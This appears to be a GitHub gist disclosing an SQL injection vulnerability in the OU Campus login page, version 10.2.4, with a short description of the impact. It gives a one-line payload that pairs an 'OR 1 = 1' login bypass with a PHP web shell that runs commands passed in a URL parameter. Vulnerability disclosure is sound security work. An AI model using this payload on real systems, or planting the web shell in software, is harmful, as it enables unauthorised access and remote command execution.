Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
SQL Injection in OU Campus
Description: OU Campus login page v 10.2.4 is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
payload: " OR 1 = 1 -- - , <?php system($_GET["cmd"]); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment